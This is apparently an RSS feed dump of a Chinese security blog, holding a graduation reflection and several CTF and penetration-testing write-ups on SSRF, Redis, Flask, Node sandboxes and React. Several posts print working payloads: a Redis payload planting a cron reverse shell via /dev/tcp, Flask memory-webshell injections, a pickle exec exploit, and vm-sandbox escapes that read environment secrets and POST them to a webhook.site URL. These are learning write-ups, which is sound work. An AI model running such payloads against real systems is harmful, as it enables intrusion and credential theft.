/Recent content on chleynx's blogHugozh-cnFri, 15 May 2026 02:18:57 +0800/posts/blog/Fri, 15 May 2026 02:18:57 +0800/posts/blog/<pre tabindex="0"><code>马上毕业了，在写致谢的时候发现好像想写的东西挺多的，但是不知道怎么写出来了，可能是因为很久没写东西了？也可能是AI用多了自己深度思考的时间少了？其实挺多时候都有想写点东西的欲望，总是因为一些原因没有写出来吧可能是太懒了。 </code></pre><p>从去年到现在，打了很多比赛，也真正意义上去公司实习了有挺多想写的。但是过年那会没有写总结，好像24年也没写。。。落下太多了，先随便挑挑补一些吧。</p> <h2 id="ctf">💭CTF：</h2> <h3 id="a">🧩A</h3> <p>在24年6月第一次以非校队的名义跟战队去了线下大型赛事“矩阵杯”，当时也是第一次去青岛挺激动的</p> <p><img src="./index.assets/image-20260515025159941.png" alt="image-20260515025159941"></p> <p>记得当时因为是第一次去，并且那会也怕打不好去之前虽然很激动但是更多的是忐忑，当然确实这次也打的一般哈哈哈。但是在赛后的party认识了很多大佬，也是不虚此行</p> <p><img src="./index.assets/f6843fe11bd6057d1211a83a4c64bd41_720.jpg" alt="f6843fe11bd6057d1211a83a4c64bd41_720"></p> <p>在中间陆陆续续也跟r3kapig打了很多国际赛，太菜了去不了线下，但是成长了许多。</p> <h3 id="b">🧩B</h3> <p>然后在25年4月我们校队又去了福州玩了，记得当时是我们这届几个人第一次打的除了国赛和省内之外的其它有线下的比赛吧。其实也挺不容易的，我们学校校队总共就从杠哥开始然后招了3个人，但是这会有两个都没打了，然后是我们这届有4个人，我们四个就是固定队友了。后来我们这会又招了5个学弟，但是后面有3个都跑了哈哈哈。所以其实算上我们下一届总共就8个人各个方向也不全，学长也没打了。每次线上比赛都打的异常艰难。那会其实知道CTF一把梭，也知道很多队是用这个打的。但是可能因为我们比较头铁也可能是无所谓吧，我们都是纯手打。而且我们比赛信息异常闭塞，平时就打打省赛，国赛，长城杯这种，然后就是自己学习，参加各大新生赛了。</p> <p>回到这次比赛，其实算是我们第一次参加的其它的吧。</p> <p><img src="./index.assets/image-20260515030318075.png" alt="image-20260515030318075"></p> <p>这也是我第一次来福建，好吧，其实我去之前总共就没出过几次重庆。。。</p> <h3 id="c">🧩C</h3> <p>这中间也打了很多其它的比赛，国际赛也没断过一直在打。</p> <p>然后就是10月跟NK参加了XCTF final了。这会我也算有比较多的经验了吧，其实这次我感觉个人发挥还好(bushi<img src="./index.assets/image-20260515032106397.png" alt="image-20260515032106397"></p> <p>记得这会AI已经很强了，很多题都能直接用AI打了，记得好像25年defcon那会他们用ida-mcp逆向的时候说是能提速好几倍。反正就是25年AI慢慢的就很强了，到我打XCTF那会已经能做很多东西了，但是我感觉因为AI出来的缘故其实我个人感觉对个人影响其实挺大的。后面单独聊聊吧。</p> <h3 id="d">🧩D</h3> <p>然后就是25年12月，第一次出国，这次比第一次去青岛更是慌了，不光怕打的不好，而且我的英语水平其实跟哑巴也没啥太大区别了，这次比赛我们是世界第二hhhh，crazyman和rec带飞。</p> <p><img src="./index.assets/image-20260515033540831.png" alt="image-20260515033540831"></p> <p>当时还在当地逛了一下，其实我感觉除了沙多点其实跟国内也差不多（bushi</p> <p>当时手机摄像头坏了。。。</p> <p><img src="./index.assets/9af26c84b5e32278a668a81a0f418b2d_720.jpg" alt="9af26c84b5e32278a668a81a0f418b2d_720"></p> <h2 id="实习">🎐实习</h2> <p>之前其实我23-25年一直都有劳务合同平时空了会出去做一些渗透，也做过一些开发项目，然后25年到现在去了两个实习。</p> <h3 id="a-1">🧩A</h3> <p>25年6月那会第一次找了个实习（我boss“认真”一顿乱投）在qax做渗透，这份工作遇到很好的大哥和一些朋友，大家平时一起搞技术，然后经常一起玩，感觉其实挺好的，也非常非常感谢他们照顾我，但是我12月左右就跑了（实习工资真有点太低了。。</p> <p>在这段实习当中大哥也带着我学了很多东西，很多有趣的vuln利用姿势等等等等，也见识了很多。</p> <h3 id="b-1">🧩B</h3> <p>从qax走后去了cxht的安研，在这主要是挖洞和红队，这里也认识了挺好的朋友，大家平时一起搞技术挖漏洞，打红队，也挺有趣的，也挺照顾我。</p> <h3 id="c-1">🧩C</h3> <p>怎么说呢，虽然大部分实习的工作之前都做过挺多了，但是与不同的人一起能够学到很多自己可能之前根本就没见过的东西。</p> <h2 id="ai">🎧AI</h2> <p>其实从chatGPT出来那会，那会其实感觉确实很鸡肋，在我那会的认知里面，觉得这就是个落后的资料查询工具而已。后面也陆陆续续的出现了其它AI产品，感觉其实也挺一般的。</p> <p>但是没过多久AI发展确实有点快了，从聊天工具到Copilot深度嵌入开发工作流，然后再MCP和Agent。慢慢也Vibe Coding成为主流，到现在AI已经算是成为大部分人必不可少的东西了。</p> <p>对我来说，它确实很好用，不管是开发还是学习还是CTF题，它都能很好的赋能，甚至能够直接完成一些东西。比如现在的CTF比赛直接把题扔给AI，一个跑不出来多开几个Agent。。。</p> <p>但是自从AI很强之后，我感觉到我深度思考的时间减少了，还有就是代码审计，bug调试这些很多需要花时间去做的都很少了。虽然AI是一个帮助学习的好工具，但是现在我感觉我的学习能力和学习的意愿都在慢慢的减弱，虽然我有主动的去控制，让自己尽量的去学习，去深度思考，不要AI解决问题就不管了。我觉得是我最近真有点懒了，还是得尽量克制自己的惰性，不能让AI控制大脑了（bushi</p> <h2 id="-最后">🫧 最后</h2> <p>写不动了，没有灵感了，后面的全是口水话了，下次少写点。</p>/posts/react2shell/Mon, 09 Feb 2026 16:30:37 +0800/posts/react2shell/<h3 id="webcve-2025-55182-react2shell">Web（CVE-2025-55182-react2shell）</h3> <blockquote> <p><strong>最近遇到一个CTF题再次看到了前端时间比较火的react2shell。</strong> <strong>这个题目大概的意思是在next@16.0.6，react@19.0.3-xx版本去绕一个特别疯狂的关键词检测waf，虽然之前这个洞刚出的时候我也去简单审了一下这个洞，但是只有个大概的了解，刚好遇到这个题，就又花时间去学习啦一下。</strong></p> </blockquote> <h3 id="1ssrrscserveractionsflight协议">1.SSR、RSC、ServerActions、Flight协议</h3> <p>在开始之前我们得先了解这个几个概念</p> <ul> <li> <p><strong>SSR</strong> ：React原本是一个前端框架，但为了SEO优化和提升首次渲染速度，开发者使用SSR技术将首次渲染放在后端执行，并将渲染后的HTML代码返回给浏览器。但此后浏览器需要下载所有组件代码和依赖库，通过Hydration过程重新执行组件逻辑来绑定交互功能，这导致JavaScript bundle过大，可交互时间很长。（纯前端）</p> </li> <li> <p><strong>RSC</strong> ：React 18引入了React Server Components（React 19中稳定）。与传统SSR不同，<strong>ServerComponents的代码永远不会下载到浏览器</strong> ——它们只在服务器执行，输出结果发送给客户端，不需要Hydration，这样可以使用庞大的依赖库（如数据库驱动）而不影响前端性能。（加了点后端的东西放一起了）</p> </li> <li> <p><strong>ServerActions</strong> ：React 19以后引入，Server Actions允许开发者直接在组件中调用服务器端函数来修改数据，无需创建API端点。React会自动处理客户端-服务器通信、数据序列化和页面更新，大幅简化了表单提交和数据修改的开发流程。</p> </li> <li> <p><strong>RSC/Flight</strong> 是一种“在网络上传递 React 组件树信息”的协议，客户端用一个解码器把服务器返回的“帧”（frame）解析成可恢复的 React 结构，再进行局部更新和渲染。</p> <p>响应类型：RSC 载荷的响应头是 content-type: text/x-component（又称 Flight payload）。</p> </li> </ul> <p>总的来说就是因为有了<strong>ServerActions</strong>之后前后端再次揉在一起从而导致了这个漏洞</p>/posts/self-xss/Mon, 19 Jan 2026 09:40:41 +0800/posts/self-xss/<h1 id="selfxss定义风险评估与进阶利用含-credentialless-iframe">Self‑XSS：定义、风险评估与进阶利用（含 Credentialless Iframe）</h1> <h2 id="0-摘要">0. 摘要</h2> <p>Self‑XSS（自触发 XSS）经常被当成“自嗨洞”，因为默认只炸在攻击者自己的会话里。但只要加上合适的东西（CSRF/会话切换/同站落点/credentialless iframe），它也能变成可复现的攻击链。</p> <p>抓两条主线：</p> <ol> <li>Self‑XSS 能不能打，核心看“执行点”能不能搬到受害者可控/可被影响的上下文里（能否完成链路闭环）。</li> <li>credentialless iframe 的坑点不在“不同源”，而在“存储隔离 + 同源 DOM 仍可能互访”的组合拳。</li> </ol>/about/Mon, 19 Jan 2026 00:00:00 +0800/about/<p>chleynx&rsquo;s blog</p>/posts/ssrf%E6%89%93redis/Thu, 09 Jan 2025 02:06:46 +0800/posts/ssrf%E6%89%93redis/<h1 id="ssrf打redis">SSRF打redis</h1> <pre tabindex="0"><code>思路：常见方法使用gopher和dict，执行redis命令，然后通过redis命令达到目的。 </code></pre><h2 id="前置知识">前置知识</h2> <p>RESP 协议</p> <p>RESP 协议是 redis 服务之间数据传输的通信协议，redis 客户端和 redis 服务端之间通信会采取 RESP 协议 因此我们后续构造 payload 时也需要转换成 RESP 协议的格式</p> <pre tabindex="0"><code>*1 $8 flushall *3 $3 set $1 1 $64 */1 * * * * bash -i &gt;&amp; /dev/tcp/xxxxxxx/xxx 0&gt;&amp;1 *4 $6 config $3 set $3 dir $16 /var/spool/cron/ *4 $6 config $3 set $10 dbfilename $4 root *1 $4 save quit </code></pre><h2 id="1写shell">1.写shell</h2> <p>直接通过redis执行命令写文件。</p> <pre tabindex="0"><code> commands = [ &#34;flushall&#34;, #清空redis f&#39;set:webshell:&#34;{shellcode}&#34;&#39;, #写入shell内容 &#39;set:dir:/scripts&#39;, #写入目录 &#39;set:dbfilename:visit.script&#39;, #设置镜像文件名 &#34;save&#34; #保存写入 ] </code></pre><p>一般为：<code>dict://&lt;host&gt;:&lt;port&gt;/info</code> 探测端口应用信息 执行命令：<code>dict://&lt;host&gt;:&lt;port&gt;/命令:参数</code> 冒号相当于空格</p>/posts/memory-horse-in-flask/Sat, 20 Jul 2024 09:22:51 +0800/posts/memory-horse-in-flask/<h1 id="flask下python内存马">FLASK下python内存马</h1> <p><a href="https://github.com/bfengj/CTF/blob/main/Web/python/%5BPython%5DFlask%E5%86%85%E5%AD%98%E9%A9%AC%E5%AD%A6%E4%B9%A0.md">Python]Flask内存马学习.md at main · bfengj/CTF (github.com)</a></p> <p><a href="https://longlone.top/%E5%AE%89%E5%85%A8/%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6/flask%E4%B8%8D%E5%87%BA%E7%BD%91%E5%9B%9E%E6%98%BE%E6%96%B9%E5%BC%8F/">flask不出网回显方式 - Longlone&rsquo;s Blog</a></p> <h2 id="初始">初始</h2> <p>在一个月黑风高的夜晚，看见一个从未见过的函数add_url_rule，然后经过亿系列的查询发现是flask的内存马常用的东西</p> <pre tabindex="0"><code>add_url_rule() 可以添加一个自定义路由，并且可以自定义匿名函数，访问这个路由就可以调用这个匿名函数 </code></pre><p>这里有payload</p> <pre tabindex="0"><code>sys.modules[&#39;__main__&#39;].__dict__[&#39;app&#39;].add_url_rule(&#39;/shell&#39;,&#39;shell&#39;,lambda :__import__(&#39;os&#39;).popen(&#39;dir&#39;).read()) ssti: {{url_for.__globals__[&#39;__builtins__&#39;][&#39;eval&#39;](\&#34;app.add_url_rule(&#39;/shell&#39;, &#39;myshell&#39;, lambda :__import__(&#39;os&#39;).popen(_request_ctx_stack.top.request.args.get(&#39;cmd&#39;)).read())\&#34;,{&#39;_request_ctx_stack&#39;:url_for.__globals__[&#39;_request_ctx_stack&#39;],&#39;app&#39;:url_for.__globals__[&#39;current_app&#39;]})}}&#34; </code></pre><p>但是！这是老版本的，关闭debug模式会调用到check函数，然后会导致报错</p> <p>然而在新版本当中，很多地方都存在check函数，so，G</p> <p>然后看见有师傅提供了方法</p> <pre tabindex="0"><code>通过@app.before_request @app.after_request来打 </code></pre>/posts/aes-cbc%E5%8F%8D%E8%BD%AC/Tue, 25 Jun 2024 00:22:51 +0800/posts/aes-cbc%E5%8F%8D%E8%BD%AC/<h1 id="aes-cbc反转攻击">AES-CBC反转攻击</h1> <p>在一些特定情况下才能使用</p>/posts/closure-privilege-escalation/Wed, 12 Jun 2024 00:22:51 +0800/posts/closure-privilege-escalation/<h2 id="闭包提权">闭包提权：</h2> <pre tabindex="0"><code>var o = (function() { var obj = { a: 1, flag: &#34;flag{test}&#34;, }; return { get: function(k) { return obj[k]; }, add: function() { n++; } }; } )(); console.log(o.get(&#34;flag&#34;)) // flag{test} </code></pre><p>首先，这里通过闭包实现了将obj这个对象让外面不可更改。实现只读的效果。</p> <p>作用：比如在有些环境下，如第三方库当中，需要保持稳定性，防止一个库被另一个库修改。</p> <p>利用：</p> <pre tabindex="0"><code> console.log(o.get(&#34;valueOf&#34;)) //[Function: valueOf] console.log(o.get(&#34;valueOf&#34;)()) // TypeError: Cannot convert undefined or null to objec // 由于valueOf是Object.prototype的方法，所以在调用时，this指向的是Object.prototype，而Object.prototype并没有flag属性，所以会报错 //定义一个原型，让obj[k]能拿到这个原型，然后返回this指向obj Object.defineProperty(Object.prototype, &#34;hacker&#34;, { get: function() { return this; } }); console.log(o.get(&#34;flag&#34;)) // flag{test} console.log(o.get(&#34;hacker&#34;)) // { a: 1, flag: &#39;flag{test}&#39; } let obj1 = o.get(&#34;hacker&#34;); obj1.flag = 2; console.log(o.get(&#34;flag&#34;)) // 2 if (o.get(&#34;flag&#34;) !== &#34;flag{test}&#34;) { console.log(&#34;flag is correct!&#34;); } // flag is correct! </code></pre><p>利用成功</p>/posts/ssrf/Sat, 01 Jun 2024 18:38:57 +0800/posts/ssrf/<h2 id="ssrf简介">SSRF简介</h2> <p>SSRF (Server-Side Request Forgery,服务器端请求伪造)是一种由攻击者构造请求，由服务端发起请求的安全漏洞。一般情况下，SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的，所以服务端能请求到与自身相连而与外网隔离的内部系统)。</p> <p>也就是（如果A是外网主机，B是不能访问外网的主机，C是能够访问A和B的主机&mdash;&mdash;-&gt;SSRF也就是A通过C访问B）</p> <h2 id="ssrf漏洞原理">SSRF漏洞原理</h2> <p>SSRF的形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。例如，黑客操作服务端从指定URL地址获取网页文本内容，加载指定地址的图片等，利用的是服务端的请求伪造。SSRF利用存在缺陷的Web 应用作为代理攻击远程和本地的服务器。</p> <p>攻击方式：</p> <ol> <li> <p>对外网、服务器所在内网、本地进行端口扫描，获取一些服务的banner信息。</p> </li> <li> <p>攻击运行在内网或本地的应用程序。</p> </li> <li> <p>对内网Web应用进行指纹识别，识别企业内部的资产信息。</p> </li> <li> <p>攻击内外网的Web应用，主要是使用HTTP GET请求就可以实现的攻击(比如struts2、SQli等)。</p> <p>利用gopher协议可以攻击内网的 Redis、Mysql、FastCGI、Ftp 等，也可以发送 GET、POST 请求，这可以拓宽 SSRF 的攻击面。</p> </li> <li> <p>利用file协议读取本地文件等。</p> </li> </ol> <h2 id="常用函数">常用函数</h2> <pre tabindex="0"><code>file_get_contents()、fsockopen()、curl_exec()、fopen()、readfile() </code></pre><h2 id="漏洞点">漏洞点</h2> <h3 id="常见ssrf漏洞验证方式">常见SSRF漏洞验证方式</h3> <pre tabindex="0"><code>排除法：浏览器f12查看源代码看是否是在本地进行了请求 比如：该资源地址类型为 http://www.xxx.com/a.php?image=URL,URL参数若是其他服务器地址就可能存在SSRF漏洞 dnslog等工具进行测试，看是否被访问(可以在盲打后台，用例中将当前准备请求的url和参数编码成base64，这样盲打后台解码后就知道是哪台机器哪个cgi触发的请求) 抓包分析发送的请求是不是通过服务器发送的，如果不是客户端发出的请求，则有可能是存在漏洞。接着找存在HTTP服务的内网地址 从漏洞平台中的历史漏洞寻找泄漏的存在web应用内网地址 通过二级域名暴力猜解工具模糊猜测内网地址 通过file协议读取内网信息获取相关地址 直接返回的Banner、title、content等信息 留意布尔型SSRF，通过判断两次不同请求结果的差异来判断是否存在SSRF，类似布尔型sql盲注方法。 </code></pre><h3 id="ssrf漏洞点挖掘">SSRF漏洞点挖掘</h3> <pre tabindex="0"><code>1. 社交分享功能：获取超链接的标题等内容进行显示 2. 转码服务：通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览 3. 在线翻译：给网址翻译对应网页的内容 4. 图片加载/下载：例如富文本编辑器中的点击下载图片到本地；通过URL地址加载或下载图片 5. 图片/文章收藏功能：主要其会取URL地址中title以及文本的内容作为显示以求一个好的用具体验 6. 云服务厂商：它会远程执行一些命令来判断网站是否存活等，所以如果可以捕获相应的信息，就可以进行ssrf测试 7. 网站采集，网站抓取的地方：一些网站会针对你输入的url进行一些信息采集工作 8. 数据库内置功能：数据库的比如mongodb的copyDatabase函数 9. 邮件系统：比如接收邮件服务器地址 10. 编码处理, 属性信息处理，文件处理：比如ffpmg，ImageMagick，docx，pdf，xml处理器等 11. 未公开的api实现以及其他扩展调用URL的功能：可以利用google 语法加上这些关键字去寻找SSRF漏洞 12.从远程服务器请求资源（upload from url 如discuz！；import &amp; expost rss feed 如web blog；使用了xml引擎对象的地方 如wordpress xmlrpc.php） </code></pre><p>url关键字</p> <pre tabindex="0"><code>Share、wap、url、link、src、source、target、u、3g、display、sourceURL、imageURL、domain </code></pre><p><a href="https://www.cnblogs.com/miruier/p/13907150.html">看看这里吧！！！SSRF漏洞</a></p> <h4 id="题目easycms">题目easycms：</h4> <p>搜索到迅睿cms 曾经存在ssrf，审计代码发现qrcode路由存在ssrf构造如下</p> <pre tabindex="0"><code>http://eci-2ze3cmcfbu4h73d67lga.cloudeci1.ichunqiu.com/index.php ?s=api &amp;c=api &amp;m=qrcode &amp;thumb=http://test.ai.darwinchow.com &amp;text=sfaf &amp;size=11 &amp;level=1 </code></pre><p>发现存在ssrf,但是直接访问127.0.0.1是被过滤的 尝试302去绕过</p> <p>302配置如下</p>/posts/nkctf/Mon, 25 Mar 2024 00:48:41 +0800/posts/nkctf/<h2></h2> <h2 id="attack_"><strong>attack_tacooooo</strong></h2> <p>账号tacooooo@qq.com</p> <p>密码tacooooo</p> <pre tabindex="0"><code>import pickle class Exploit(object): def __reduce__(self): code = &#34;&#34;&#34; import os def find_flag_and_write(source_directory, destination_path, destination_file_name): with open(&#34;/proc/1/environ&#34;, &#39;r&#39;) as flag_file: flag_content = flag_file.read() destination_file_path = os.path.join(destination_path, destination_file_name) with open(destination_file_path, &#39;a&#39;) as destination_file: destination_file.write(flag_content) find_flag_and_write(&#39;/&#39;, &#39;../var/lib/pgadmin/storage/tacooooo_qq.com/&#39;, &#39;flag.txt&#39;) &#34;&#34;&#34; # 使用纯 Python 代码来写入文件 return (exec, (code,)) # 序列化 exploit 对象 with open(&#39;posix.pickle&#39;, &#39;wb&#39;) as f: pickle.dump(Exploit(), f) </code></pre><h2 id="全世界最简单的ctf"><strong>全世界最简单的CTF</strong></h2> <p>source</p> <pre tabindex="0"><code>const express = require(&#39;express&#39;); const bodyParser = require(&#39;body-parser&#39;); const app = express(); const fs = require(&#34;fs&#34;); const path = require(&#39;path&#39;); const vm = require(&#34;vm&#34;); app.use(bodyParser.json()) .set(&#39;views&#39;, path.join(__dirname, &#39;views&#39;)) .use(express.static(path.join(__dirname, &#39;/public&#39;))) app.get(&#39;/&#39;, function(req, res) { res.sendFile(__dirname + &#39;/public/home.html&#39;); }) function waf(code) { let pattern = /(process|\[.*?\]|exec|spawn|Buffer|\\|\+|concat|eval|Function)/g; if (code.match(pattern)) { throw new Error(&#34;what can I say? hacker out!!&#34;); } } app.post(&#39;/&#39;, function(req, res) { let code = req.body.code; let sandbox = Object.create(null); let context = vm.createContext(sandbox); try { waf(code) let result = vm.runInContext(code, context); console.log(result); } catch (e) { console.log(e.message); require(&#39;./hack&#39;); } }) app.get(&#39;/secret&#39;, function(req, res) { if (process.__filename == null) { let content = fs.readFileSync(__filename, &#34;utf-8&#34;); return res.send(content); } else { let content = fs.readFileSync(process.__filename, &#34;utf-8&#34;); return res.send(content); } }) app.listen(3000, () =&gt; { console.log(&#34;listen on 3000&#34;); }) </code></pre><pre tabindex="0"><code>payload: 1、 throw new Proxy({}, { get: function() { const cc = arguments.callee.caller; const g = (cc.constructor.constructor(`return ${`${&#39;proces&#39;}s`}`))(); const h = g.mainModule.require(&#39;fs&#39;).readFileSync(&#39;/proc/self/environ&#39;); const p = (cc.constructor.constructor(&#39;return fetch&#39;))(); return p(&#34;https://webhook.site/1dc4e877-3eb8-4642-a3ef-17fc03f43ffa&#34;, {method: &#34;POST&#34;, body: JSON.stringify({data: `${h}`})}); } }) exec被ban然后执行不了命令，中括号我本地能过，但是环境上不行。fs模块读不到flag文件。 2、 过滤了中括号 throw new Proxy({}, { get: function() { const cc = arguments.callee.caller; const gg = (cc.constructor.constructor(`return ${`${&#39;proces&#39;}s`}`))(); const hh = gg.mainModule.require(`${&#39;child_p&#39;}rocess`); const ff = (cc.constructor.constructor(`s = 1+2`))(); const p = (cc.constructor.constructor(&#39;return fetch&#39;))(); return p(&#34;https://webhook.site/1dc4e877-3eb8-4642-a3ef-17fc03f43ffa&#34;, {method: &#34;POST&#34;, body: JSON.stringify({data: `${s}`})}); } }) 两个思路： 再构造一个函数。-------------不知道为什么不行 可以写入js文件，使用fork执行然后fetch出来。--------------ok！ payload： // 文件写入suceess throw new Proxy({}, { get: function() { const cc = arguments.callee.caller; const gg = (cc.constructor.constructor(`return ${`${&#39;proces&#39;}s`}`))(); let content = ` let cs = require(&#39;${`${&#39;child_p&#39;}rocess&#39;).exe`}cSync(&#39;/readflag&#39;).toString(); ${`${&#39;proces&#39;}s`}.on(&#34;message&#34;,function(msg){ fetch(&#34;https://webhook.site/1dc4e877-3eb8-4642-a3ef-17fc03f43ffa&#34;, {method: &#34;POST&#34;, body: JSON.stringify({data: cs})}); }) `; const fs = gg.mainModule.require(&#39;fs&#39;).appendFileSync(&#34;./readflag1.js&#34;,content); const p = (cc.constructor.constructor(&#39;return fetch&#39;))(); return p(&#34;https://webhook.site/1dc4e877-3eb8-4642-a3ef-17fc03f43ffa&#34;, {method: &#34;POST&#34;, body: JSON.stringify({data: `${fs}`})}); } }) //通信成功 throw new Proxy({}, { get: function() { const cc = arguments.callee.caller; const g = (cc.constructor.constructor(`return ${`${&#39;proces&#39;}s`}`))(); const h = g.mainModule.require(`${&#39;child_p&#39;}rocess`).fork(&#39;./readflag1.js&#39;); h.send(&#39;hello&#39;); const p = (cc.constructor.constructor(&#39;return fetch&#39;))(); return p(&#34;https://webhook.site/1dc4e877-3eb8-4642-a3ef-17fc03f43ffa&#34;, {method: &#34;POST&#34;, body: JSON.stringify({data: `${h}`})}); } }) { &#34;data&#34;: &#34;NKCTF{5e1d772e-8260-444d-ab4b-21c7b7603521}\n&#34; } </code></pre><h3 id="img"><img src="/1.png" alt="img"></h3> <h2 id="my-first-cms"><strong>my first cms</strong></h2> <p>这是什么cms？直接安装最新版的应该没有问题了吧……</p> <p><a href="https://github.com/capture0x/CMSMadeSimple2">GitHub - capture0x/CMSMadeSimple2: CMS Made Simple Version: 2.2.19 - SSTI</a></p> <p>admin Admin123</p>/posts/n1ctf-junoir/Wed, 07 Feb 2024 02:47:11 +0800/posts/n1ctf-junoir/<h1 id="n1ctf-junior">N1CTF Junior</h1> <h2 id="zako">zako</h2>/posts/dicectf/Tue, 06 Feb 2024 14:06:46 +0800/posts/dicectf/<h2 id="another-csp">another-csp</h2> <h3 id="indexjs">index.js</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-javascript" data-lang="javascript"><span style="display:flex;"><span><span style="color:#66d9ef">import</span> { <span style="color:#a6e22e">createServer</span> } <span style="color:#a6e22e">from</span> <span style="color:#e6db74">&#39;http&#39;</span>; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">import</span> { <span style="color:#a6e22e">readFileSync</span> } <span style="color:#a6e22e">from</span> <span style="color:#e6db74">&#39;fs&#39;</span>; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">import</span> { <span style="color:#a6e22e">spawn</span> } <span style="color:#a6e22e">from</span> <span style="color:#e6db74">&#39;child_process&#39;</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">import</span> { <span style="color:#a6e22e">randomInt</span> } <span style="color:#a6e22e">from</span> <span style="color:#e6db74">&#39;crypto&#39;</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">sleep</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">timeout</span> =&gt; <span style="color:#66d9ef">new</span> Promise(<span style="color:#a6e22e">resolve</span> =&gt; <span style="color:#a6e22e">setTimeout</span>(<span style="color:#a6e22e">resolve</span>, <span style="color:#a6e22e">timeout</span>)); </span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">wait</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">child</span> =&gt; <span style="color:#66d9ef">new</span> Promise(<span style="color:#a6e22e">resolve</span> =&gt; <span style="color:#a6e22e">child</span>.<span style="color:#a6e22e">on</span>(<span style="color:#e6db74">&#39;exit&#39;</span>, <span style="color:#a6e22e">resolve</span>)); </span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">index</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">readFileSync</span>(<span style="color:#e6db74">&#39;index.html&#39;</span>, <span style="color:#e6db74">&#39;utf-8&#39;</span>); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">let</span> <span style="color:#a6e22e">token</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">randomInt</span>(<span style="color:#ae81ff">2</span> <span style="color:#f92672">**</span> <span style="color:#ae81ff">24</span>).<span style="color:#a6e22e">toString</span>(<span style="color:#ae81ff">16</span>).<span style="color:#a6e22e">padStart</span>(<span style="color:#ae81ff">6</span>, <span style="color:#e6db74">&#39;0&#39;</span>); </span></span><span style="display:flex;"><span><span style="color:#66d9ef">let</span> <span style="color:#a6e22e">browserOpen</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">visit</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">async</span> <span style="color:#a6e22e">code</span> =&gt; { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">browserOpen</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">proc</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">spawn</span>(<span style="color:#e6db74">&#39;node&#39;</span>, [<span style="color:#e6db74">&#39;visit.js&#39;</span>, <span style="color:#a6e22e">token</span>, <span style="color:#a6e22e">code</span>], { <span style="color:#a6e22e">detached</span><span style="color:#f92672">:</span> <span style="color:#66d9ef">true</span> }); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> Promise.<span style="color:#a6e22e">race</span>([ </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">wait</span>(<span style="color:#a6e22e">proc</span>), </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">sleep</span>(<span style="color:#ae81ff">10000</span>) </span></span><span style="display:flex;"><span> ]); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">proc</span>.<span style="color:#a6e22e">exitCode</span> <span style="color:#f92672">===</span> <span style="color:#66d9ef">null</span>) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">process</span>.<span style="color:#a6e22e">kill</span>(<span style="color:#f92672">-</span><span style="color:#a6e22e">proc</span>.<span style="color:#a6e22e">pid</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">browserOpen</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>; </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#a6e22e">createServer</span>(<span style="color:#66d9ef">async</span> (<span style="color:#a6e22e">req</span>, <span style="color:#a6e22e">res</span>) =&gt; { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">url</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> <span style="color:#a6e22e">URL</span>(<span style="color:#a6e22e">req</span>.<span style="color:#a6e22e">url</span>, <span style="color:#e6db74">&#39;http://localhost/&#39;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">url</span>.<span style="color:#a6e22e">pathname</span> <span style="color:#f92672">===</span> <span style="color:#e6db74">&#39;/&#39;</span>) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">res</span>.<span style="color:#a6e22e">end</span>(<span style="color:#a6e22e">index</span>); </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">url</span>.<span style="color:#a6e22e">pathname</span> <span style="color:#f92672">===</span> <span style="color:#e6db74">&#39;/bot&#39;</span>) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">browserOpen</span>) <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">res</span>.<span style="color:#a6e22e">end</span>(<span style="color:#e6db74">&#39;already open!&#39;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">code</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">url</span>.<span style="color:#a6e22e">searchParams</span>.<span style="color:#a6e22e">get</span>(<span style="color:#e6db74">&#39;code&#39;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span><span style="color:#a6e22e">code</span> <span style="color:#f92672">||</span> <span style="color:#a6e22e">code</span>.<span 